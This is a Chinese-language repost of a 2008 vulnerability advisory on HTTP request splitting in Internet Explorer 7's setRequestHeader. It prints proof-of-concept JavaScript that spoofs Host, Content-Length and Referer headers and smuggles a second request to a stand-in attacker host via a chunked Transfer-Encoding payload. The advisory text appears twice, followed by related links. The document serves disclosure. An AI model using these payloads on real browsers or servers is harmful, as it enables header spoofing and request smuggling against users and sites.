Microsoft IE 7 setRequestHeader()函数多个请求拆分/渗透漏洞
2008-03-26 15:45
435 查看
受影响版本:
Microsoft Internet Explorer 7.0.5730.11
- Microsoft Windows XP SP2
描述:
BUGTRAQ ID: 28379
Internet Explorer是微软发布的非常流行的WEB浏览器。
IE 7允许通过HTTP请求拆分攻击覆盖Content-Length、Host和Referer等HTTP头,导致HTTP头信息欺骗。
类似于以下javascript:
----------------------------------------------
var x=new XMLHttpRequest();
x.open("POST","/");
for(f=127;f<255;f++)
try{
x.setRequestHeader("Host"+String.fromCharCode(f),"Test");
}catch(dd){}
x.setRequestHeader("Connection","keep-alive");
x.onreadystatechange=function (){
if (x.readyState == 4){
}
}
x.send("blah");
----------------------------------------------
会覆盖以下头:
- Content-Length
x.setRequestHeader("Content-Length"+String.fromCharCode(201),"0");
x.setRequestHeader("Content-Length"+String.fromCharCode(233),"0");
x.setRequestHeader("Content-Length"+String.fromCharCode(240)+String.fromCharCode(213),"0");
- Host
x.setRequestHeader("Host"+String.fromCharCode(223), "www.microsoft.com");
- Referer
x.setRequestHeader("Referer"+String.fromCharCode(205)+String.fromCharCode(155),"http://www.referrer.tld");
x.setRequestHeader("Referer"+String.fromCharCode(237)+String.fromCharCode(155),"http://www.referrer.tld");
Internet Explorer 7允许在setRequestHeader中设置Transfer Encoding: chunked头,导致Http请求拆分/渗透漏洞。
假设存在反射跨站脚本漏洞影响的站点与攻击者的站点托管在同一台主机上,且用户没有配置代理,由于IE7允许设置
setRequestHeader("Transfer-Encoding","chunked");
因此就允许将POST请求中的负载用作Web服务器的其他请求。例如:
-----------------------------------------------------
var x=new XMLHttpRequest();
for(var i =0; i<1;i++){
x.open("POST","/");
x.setRequestHeader("Transfer-Encoding","chunked");
x.setRequestHeader("Proxy-Connection","keep-alive");
x.setRequestHeader("Connection","keep-alive");
x.onreadystatechange=function (){
if (x.readyState == 4){
}
}
try{
x.send("0/r/n/r/nPOST / HTTP/1.1/r/nHost:
at.tack.er/r/nContent-Length: SOMELENGTH/r/n/r/n") }catch(r){} }
-----------------------------------------------------
请求会变为:
----------------------------------------------------
POST / HTTP/1.1
Accept: */*
Accept-Language: it
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Referer: http://vi.ct.im/ UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
.NET CLR 2.0.50727; .NET CLR 1.1.4322)
Host: at.tack.er
Content-Length: 67
0
POST /?Send1 HTTP/1.1
Host: at.tack.er
Content-Length: TheLenghtOfTheNextRequest
----------------------------------------------------
这样Web服务器就会打开套接字等待负载。
<* 参考:
Stefano Di Paola (stefano@dipaola.wisec.it)
链接:http://marc.info/?l=webappsec&m=120611364624166&w=2 http://marc.info/?l=webappsec&m=120611380224435&w=2
*>
建议:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/windows/ie/default.asp
Microsoft Internet Explorer 7.0.5730.11
- Microsoft Windows XP SP2
描述:
BUGTRAQ ID: 28379
Internet Explorer是微软发布的非常流行的WEB浏览器。
IE 7允许通过HTTP请求拆分攻击覆盖Content-Length、Host和Referer等HTTP头,导致HTTP头信息欺骗。
类似于以下javascript:
----------------------------------------------
var x=new XMLHttpRequest();
x.open("POST","/");
for(f=127;f<255;f++)
try{
x.setRequestHeader("Host"+String.fromCharCode(f),"Test");
}catch(dd){}
x.setRequestHeader("Connection","keep-alive");
x.onreadystatechange=function (){
if (x.readyState == 4){
}
}
x.send("blah");
----------------------------------------------
会覆盖以下头:
- Content-Length
x.setRequestHeader("Content-Length"+String.fromCharCode(201),"0");
x.setRequestHeader("Content-Length"+String.fromCharCode(233),"0");
x.setRequestHeader("Content-Length"+String.fromCharCode(240)+String.fromCharCode(213),"0");
- Host
x.setRequestHeader("Host"+String.fromCharCode(223), "www.microsoft.com");
- Referer
x.setRequestHeader("Referer"+String.fromCharCode(205)+String.fromCharCode(155),"http://www.referrer.tld");
x.setRequestHeader("Referer"+String.fromCharCode(237)+String.fromCharCode(155),"http://www.referrer.tld");
Internet Explorer 7允许在setRequestHeader中设置Transfer Encoding: chunked头,导致Http请求拆分/渗透漏洞。
假设存在反射跨站脚本漏洞影响的站点与攻击者的站点托管在同一台主机上,且用户没有配置代理,由于IE7允许设置
setRequestHeader("Transfer-Encoding","chunked");
因此就允许将POST请求中的负载用作Web服务器的其他请求。例如:
-----------------------------------------------------
var x=new XMLHttpRequest();
for(var i =0; i<1;i++){
x.open("POST","/");
x.setRequestHeader("Transfer-Encoding","chunked");
x.setRequestHeader("Proxy-Connection","keep-alive");
x.setRequestHeader("Connection","keep-alive");
x.onreadystatechange=function (){
if (x.readyState == 4){
}
}
try{
x.send("0/r/n/r/nPOST / HTTP/1.1/r/nHost:
at.tack.er/r/nContent-Length: SOMELENGTH/r/n/r/n") }catch(r){} }
-----------------------------------------------------
请求会变为:
----------------------------------------------------
POST / HTTP/1.1
Accept: */*
Accept-Language: it
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: no-cache
Referer: http://vi.ct.im/ UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
.NET CLR 2.0.50727; .NET CLR 1.1.4322)
Host: at.tack.er
Content-Length: 67
0
POST /?Send1 HTTP/1.1
Host: at.tack.er
Content-Length: TheLenghtOfTheNextRequest
----------------------------------------------------
这样Web服务器就会打开套接字等待负载。
<* 参考:
Stefano Di Paola (stefano@dipaola.wisec.it)
链接:http://marc.info/?l=webappsec&m=120611364624166&w=2 http://marc.info/?l=webappsec&m=120611380224435&w=2
*>
建议:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/windows/ie/default.asp
相关文章推荐
- 关于ajax拦截跨源请求出现问题与setRequestHeader
- ajax中的setRequestHeader设置请求头
- Monkey ‘mk_request_header_process’函数输入验证漏洞
- microsoft ie javascript及xml 远程信息泄露漏洞
- AJAX中同时发送多个请求XMLHttpRequest对象处理方法
- {readyState: 0, getResponseHeader: ƒ, getAllResponseHeaders: ƒ, setRequestHeader: ƒ, overrideMimeTyp
- 微信接口请求万能函数http_request
- 通过request的Header获取请求URL的引用地址
- 4.SpringMVC_@RequestParam和@RequestHeader 、@CookieValue 获取请求参数
- request路径请求函数
- PHP extract 将数组拆分成多个变量的函数
- IE7+浏览器下XMLHttpRequest跨域请求安全配置
- SpringMVC(六):@RequestMapping下使用@RequestHeader绑定请求报头的属性值、@CookieValue绑定请求中的Cookie值
- Microsoft Dynamics CRM 4 GenerateAuthenticationHeader() 函数
- PHP extract 将数组拆分成多个变量的函数
- Microsoft IE 浏览器中Frameset远程拒绝服务漏洞
- Web service request SetParameters to Report Server http://host/reportserver failed. Error: 请求因 HTTP 状态 401 失败: Unauthorized
- [PHP开发] 关于header setcookie session_start 3个函数的怪问题
- microsoft ie javascript及xml 远程信息泄露漏洞
- OpenSSH 'child_set_env()'函数安全绕过漏洞